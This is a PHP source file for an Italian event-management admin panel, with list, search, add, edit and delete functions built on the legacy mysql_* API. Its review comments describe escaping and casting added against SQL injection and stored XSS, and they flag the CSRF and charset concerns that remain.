
<?php


//////////////////////////EVENTI
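/**
 * Builds the admin HTML listing of all events, newest first.
 *
 * Reads every row of the `event` table through the global $conn link and
 * renders a search form followed by a table with one edit link and one
 * delete link per row.
 *
 * Values coming from the database are HTML-escaped before being written into
 * the markup, so a stored title, location or description cannot inject
 * script into the admin page (stored XSS). The row id is cast to int before
 * being placed in the link URLs.
 *
 * NOTE(review): the delete link triggers a state change through a plain GET
 * request; no anti-CSRF token is visible in this file - confirm one is
 * enforced by the caller.
 *
 * @return string HTML fragment
 */
function listae() {
	global $conn, $id;
	$output = '<span class="left"><h1 class="left">' . LISTA . ' Eventi</h1>&nbsp;&nbsp;&nbsp;&nbsp;<a class="right button" href="?azione=inseriscie">' . ADD . ' &raquo;</a></span><span class="right">';
	$output .= '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=resulte" method="post">';
	$output .= '<input type="text" style="padding:5px" id="ricerca" name="ricerca"/>';
	$output .= '&nbsp;&nbsp;<input type="submit" value="' . CERCA . '" id="myButton"/>';
	$output .= '</form></span>';
	$output .= '<div id="show" class="clear">';
	$output .= '<table cellspacing="0" width="100%" align="center">';
	$output .= '<tr>
			<th>' . DATA . '</th>
			<th>' . TITOLO . '</th>
			<th>Location</th>
			<th>' . DESC . '</th>			
			<th></th>
			<th></th></tr>';
	$sql = 'select * from event order by ev_data DESC ';
	$dati = mysql_query($sql, $conn) or die(mysql_error());

	while ($array = mysql_fetch_array($dati)) {
		// ev_data is sliced at fixed offsets (year 0-3, month 5-6, day 8-9)
		// and displayed as DD-MM-YYYY.
		$g = substr($array['ev_data'], 8, 2);
		$m = substr($array['ev_data'], 5, 2);
		$a = substr($array['ev_data'], 0, 4);
		$data = $g . '-' . $m . '-' . $a;

		// Integer cast keeps anything but a number out of the href values.
		$ev_id = (int) $array['ev_id'];

		$output .= '<tr>';
		// htmlspecialchars() is called without an explicit charset on purpose:
		// the page encoding is not visible here and the characters that matter
		// (< > & " ') are ASCII in every charset the function accepts.
		$output .= '<td>' . htmlspecialchars($data, ENT_QUOTES) . '</td>';
		$output .= '<td>' . htmlspecialchars($array['ev_titolo'], ENT_QUOTES) . '</td>';
		$output .= '<td>' . htmlspecialchars($array['ev_loc'], ENT_QUOTES) . '</td>';
		// NOTE(review): if descriptions are meant to carry markup, replace this
		// escape with an allow-list HTML sanitizer rather than raw output.
		$output .= '<td>' . htmlspecialchars($array['ev_desc'], ENT_QUOTES) . '</td>';
		$output .= '<td align="center"><a class="right modifica show-option" title="' . MOD . '" href="?azione=modificae&id=' . $ev_id . '"></a></td>';
		$output .= '<td align="center"><a class="right cancel show-option" title="' . DELETE . '" href="index.php?azione=eliminae&id=' . $ev_id . '" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"></a></td>';
		$output .= '</tr>';
	}
	$output .= '</table></div><br /><br />';
	return ($output);
}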


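/**
 * Builds the admin HTML listing of the events whose title contains the
 * search term posted in the `ricerca` form field.
 *
 * The term is escaped with mysql_real_escape_string() before being placed in
 * the LIKE pattern. Values read back from the database are HTML-escaped
 * before being written into the markup (stored XSS), and the row id is cast
 * to int before being placed in the link URLs.
 *
 * NOTE(review): mysql_real_escape_string() is only reliable when the
 * connection charset was set through mysql_set_charset(); that call is not
 * visible in this file. The mysql_* extension has no prepared statements;
 * a move to mysqli/PDO with bound parameters would remove the dependency on
 * escaping. LIKE wildcards (% and _) typed by the user are passed through
 * unchanged.
 *
 * @return string HTML fragment
 */
function resulte() {
	global $conn, $id;
	// A missing field is treated as an empty search instead of raising a notice.
	$ricerca = isset($_POST['ricerca']) ? (string) $_POST['ricerca'] : '';
	$result = mysql_real_escape_string($ricerca, $conn);
	$output = '<span class="left"><h1 class="left">' . LISTA . ' Eventi</h1>&nbsp;&nbsp;&nbsp;&nbsp;<a class="right button" href="?azione=inseriscie">' . ADD . ' &raquo;</a></span><span class="right">';
	$output .= '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=resulte" method="post">';
	$output .= '<input type="text" style="padding:5px" id="ricerca" name="ricerca"/>';
	$output .= '&nbsp;&nbsp;<input type="submit" value="' . CERCA . '" id="myButton"/>';
	$output .= '</form></span>';
	$output .= '<div id="show" class="clear">';
	$output .= '<table cellspacing="0" width="100%" align="center">';
	$output .= '<tr>
			<th>' . DATA . '</th>
			<th>' . TITOLO . '</th>
			<th>Location</th>
			<th>Descrizione</th>			
			<th></th>
			<th></th></tr>';
	$sql = 'select * from event where ev_titolo like \'%' . $result . '%\' order by ev_data DESC ';
	$dati = mysql_query($sql, $conn) or die(mysql_error());

	if (mysql_num_rows($dati) > 0) {
		while ($array = mysql_fetch_array($dati)) {
			// ev_data is sliced at fixed offsets and displayed as DD-MM-YYYY.
			$g = substr($array['ev_data'], 8, 2);
			$m = substr($array['ev_data'], 5, 2);
			$a = substr($array['ev_data'], 0, 4);
			$data = $g . '-' . $m . '-' . $a;

			// Integer cast keeps anything but a number out of the href values.
			$ev_id = (int) $array['ev_id'];

			$output .= '<tr>';
			// No explicit charset: the page encoding is not visible here and the
			// characters being escaped are ASCII in every supported charset.
			$output .= '<td>' . htmlspecialchars($data, ENT_QUOTES) . '</td>';
			$output .= '<td>' . htmlspecialchars($array['ev_titolo'], ENT_QUOTES) . '</td>';
			$output .= '<td>' . htmlspecialchars($array['ev_loc'], ENT_QUOTES) . '</td>';
			// NOTE(review): if descriptions are meant to carry markup, use an
			// allow-list HTML sanitizer here instead of raw output.
			$output .= '<td>' . htmlspecialchars($array['ev_desc'], ENT_QUOTES) . '</td>';
			$output .= '<td align="center"><a class="right modifica show-option" title="' . MOD . '" href="?azione=modificae&id=' . $ev_id . '"></a></td>';
			$output .= '<td align="center"><a class="right cancel show-option" title="' . DELETE . '" href="index.php?azione=eliminae&id=' . $ev_id . '" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"></a></td>';
			$output .= '</tr>';
		}
		$output .= '</table></div><br /><br />';
	} else {
		$output .= '<tr>';
		// The table has six columns, so the "no results" cell spans all of them.
		$output .= '<td colspan="6">Nessun risultato</td>';
		$output .= '</tr>';
		$output .= '</table><br /><br />';
		$output .= '</div>';
	}

	return ($output);
}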

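/**
 * Builds the empty "add event" HTML form, which posts to ?azione=salvae.
 *
 * The original version ran a SELECT built by concatenating the global $id
 * into the SQL text and never used the result; that query is removed, which
 * also removes an injectable statement from a code path that does not need
 * the database at all. The id written into the form action is cast to int so
 * that it cannot break out of the attribute.
 *
 * NOTE(review): the origin of the global $id is not visible in this file -
 * presumably a request parameter set by the caller; verify.
 * NOTE(review): the form carries no anti-CSRF token - confirm the caller
 * adds or checks one.
 *
 * @return string HTML fragment
 */
function inseriscie() {
	global $id;
	$form_id = (int) $id;
	$output = '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvae&id=' . $form_id . '" method="post">';
	$output .= '<h1>' . ADD . ' Evento</h1>';
	$output .= '<a class="button" href="javascript:history.back()">' . BACK . '</a>&nbsp;<a class="show-option button" href="#" title="teeext">info »</a><br /><br />';
	$output .= '<label for="miadata">' . DATA . '</label><br />';
	$output .= '<input type="text" id="miadata" name="miadata" /><br />';
	$output .= '<label for="titolo">' . TITOLO . '</label><br />';
	$output .= '<input type="text" id="titolo" name="titolo" /><br />';
	$output .= '<label for="location">Location</label><br />';
	// id fixed from "lovation" so the label above is bound to this input.
	$output .= '<input type="text" id="location" name="location" /><br />';
	$output .= '<label for="testo">' . TEXT . '</label><br />';
	$output .= '<textarea id="testo" name="testo"></textarea><br /><br />';
	$output .= '<input type="submit" value="' . SALVA . '" id="myButton"/><br /><br />';
	// The stray </fieldset> (never opened) is dropped.
	$output .= '</form>';
	return ($output);
}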

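/**
 * Builds the "edit event" HTML form pre-filled with the event selected by
 * the global $id, posting to ?azione=salvae.
 *
 * The id is cast to int before it is used in the SQL text and in the form
 * action, which closes the SQL injection and attribute-injection paths that
 * string concatenation of a raw id leaves open. Stored values are
 * HTML-escaped before being placed in attribute values and in the textarea,
 * so a title containing a double quote or a description containing
 * "</textarea>" can no longer break out of the field.
 *
 * NOTE(review): the origin of the global $id is not visible in this file -
 * presumably a request parameter set by the caller; verify.
 *
 * @return string HTML fragment
 */
function modificae() {
	global $conn, $id;
	$ev_id = (int) $id;
	$sql = 'select * from event where ev_id="' . $ev_id . '"  ';
	$dati_ev = mysql_query($sql, $conn) or die(mysql_error());
	$array_ev = mysql_fetch_array($dati_ev);
	if (!is_array($array_ev)) {
		// No matching row: render the form with empty fields.
		$array_ev = array('ev_data' => '', 'ev_titolo' => '', 'ev_loc' => '', 'ev_desc' => '');
	}

	// The stored date is sliced at fixed offsets and shown as MM/DD/YYYY,
	// the layout salvae() reads back.
	$g = substr($array_ev['ev_data'], 8, 2);
	$m = substr($array_ev['ev_data'], 5, 2);
	$a = substr($array_ev['ev_data'], 0, 4);
	$data = $m . '/' . $g . '/' . $a;

	$output = '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvae&id=' . $ev_id . '" method="post">';

	$output .= '<h1>' . MOD . ' Evento</h1>';
	$output .= '<a class="button" href="javascript:history.back()">' . BACK . '</a>&nbsp;<a class="show-option button" href="#" title="teeeext">info »</a><br /><br />';
	$output .= '<label for="miadata">' . DATA . '</label><br />';
	// No explicit charset on htmlspecialchars(): the page encoding is not
	// visible here and the escaped characters are ASCII in every charset.
	$output .= '<input type="text" id="miadata" name="miadata" value="' . htmlspecialchars($data, ENT_QUOTES) . '" /><br />';
	$output .= '<label for="titolo">' . TITOLO . '</label><br />';
	$output .= '<input type="text" id="titolo" name="titolo" value="' . htmlspecialchars($array_ev['ev_titolo'], ENT_QUOTES) . '" /><br />';
	$output .= '<label for="location">Location</label><br />';
	$output .= '<input type="text" id="location" name="location" value="' . htmlspecialchars($array_ev['ev_loc'], ENT_QUOTES) . '" /><br />';
	$output .= '<label for="testo">' . TEXT . '</label><br />';
	$output .= '<textarea id="testo" name="testo">' . htmlspecialchars($array_ev['ev_desc'], ENT_QUOTES) . '</textarea><br /><br />';
	$output .= '<input type="submit" value="' . SALVA . '" id="myButton"/><br /><br />';

	$output .= '</form>';
	return ($output);
}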

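/**
 * Inserts a new event (global $id equal to 0) or updates the event with that
 * id, using the posted fields `titolo`, `testo`, `location` and `miadata`,
 * then sends a redirect header back to the list.
 *
 * Every value placed in the SQL text is now escaped or cast:
 *  - the date, previously rebuilt from raw substr() slices of
 *    $_POST['miadata'] and concatenated unescaped, goes through
 *    mysql_real_escape_string() like the other fields;
 *  - the id used in the UPDATE is cast to int.
 *
 * NOTE(review): mysql_real_escape_string() is only reliable when the
 * connection charset was set through mysql_set_charset(); that call is not
 * visible in this file. Bound parameters (mysqli/PDO) would be the durable
 * fix. The date is still not validated as a calendar date.
 * NOTE(review): no anti-CSRF token or permission check is visible in this
 * function - confirm the caller enforces both.
 *
 * @return string HTML status message (execution continues after header())
 */
function salvae() {
	global $conn, $id;
	$errore = 0;

	// Missing fields are treated as empty strings instead of raising notices.
	$titolo = mysql_real_escape_string(isset($_POST['titolo']) ? (string) $_POST['titolo'] : '', $conn);
	$testo = mysql_real_escape_string(isset($_POST['testo']) ? (string) $_POST['testo'] : '', $conn);
	$location = mysql_real_escape_string(isset($_POST['location']) ? (string) $_POST['location'] : '', $conn);
	$miadata = isset($_POST['miadata']) ? (string) $_POST['miadata'] : '';

	// The form sends MM/DD/YYYY; the pieces are cut at fixed offsets and
	// reassembled as a DATETIME literal, then escaped before use in SQL.
	$g = substr($miadata, 3, 2);
	$m = substr($miadata, 0, 2);
	$a = substr($miadata, 6, 4);
	$data = mysql_real_escape_string($a . '-' . $m . '-' . $g . ' 00:00:00', $conn);

	if ($errore == 0) {
		if ($id == 0) {
			$sql = 'insert into event (ev_titolo,ev_desc,ev_data,ev_loc) values("' . $titolo . '","' . $testo . '","' . $data . '","' . $location . '")';
			$output = 'Record inserito.<br /><a href="index.php?azione=listan">Torna alla lista</a>';
			mysql_query($sql, $conn) or die(mysql_error());

			// NOTE(review): this branch points at azione=listan while the
			// update branch uses azione=listae - confirm which is intended.
			header('location: index.php?ins&azione=listan');
			// The unreachable mysql_insert_id() call after this return is dropped.
			return ($output);
		} else {
			$ev_id = (int) $id;
			$sql = 'update event set ev_titolo="' . $titolo . '", ev_desc="' . $testo . '", ev_data="' . $data . '", ev_loc="' . $location . '" where ev_id="' . $ev_id . '" ';
			$output = 'Record aggiornato.<br /><a href="index.php?azione=listae&page=1">Torna alla lista</a>';
			mysql_query($sql, $conn) or die(mysql_error());
			header('location: index.php?agg&azione=listae');
		}
	} else {
		$output = 'errore nel form.<br /><a href="javascript:history.go(-1)">Torna indietro</a>';
	}
	return ($output);
}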

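/**
 * Deletes the event identified by the global $id and sends a redirect header
 * back to the list.
 *
 * The id is cast to int before it is placed in the DELETE statement; with
 * raw concatenation a crafted id could widen the WHERE clause and remove
 * other rows. The query now uses the $conn link explicitly, as the list and
 * save functions do.
 *
 * NOTE(review): the listing pages reach this action through a plain GET
 * link, and no anti-CSRF token or permission check is visible in this
 * function - confirm the caller enforces both, and prefer POST for deletes.
 *
 * @return string HTML status message (execution continues after header())
 */
function eliminae() {
	global $conn, $id;
	$ev_id = (int) $id;
	$sql = 'delete from event where ev_id="' . $ev_id . '"';
	mysql_query($sql, $conn) or die(mysql_error());
	header('location: index.php?del&azione=listae');
	$output = 'Record eliminato.<br /><a href="index.php?azione=listae&page=1">Torna alla lista</a>';
	return ($output);
}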


?>	
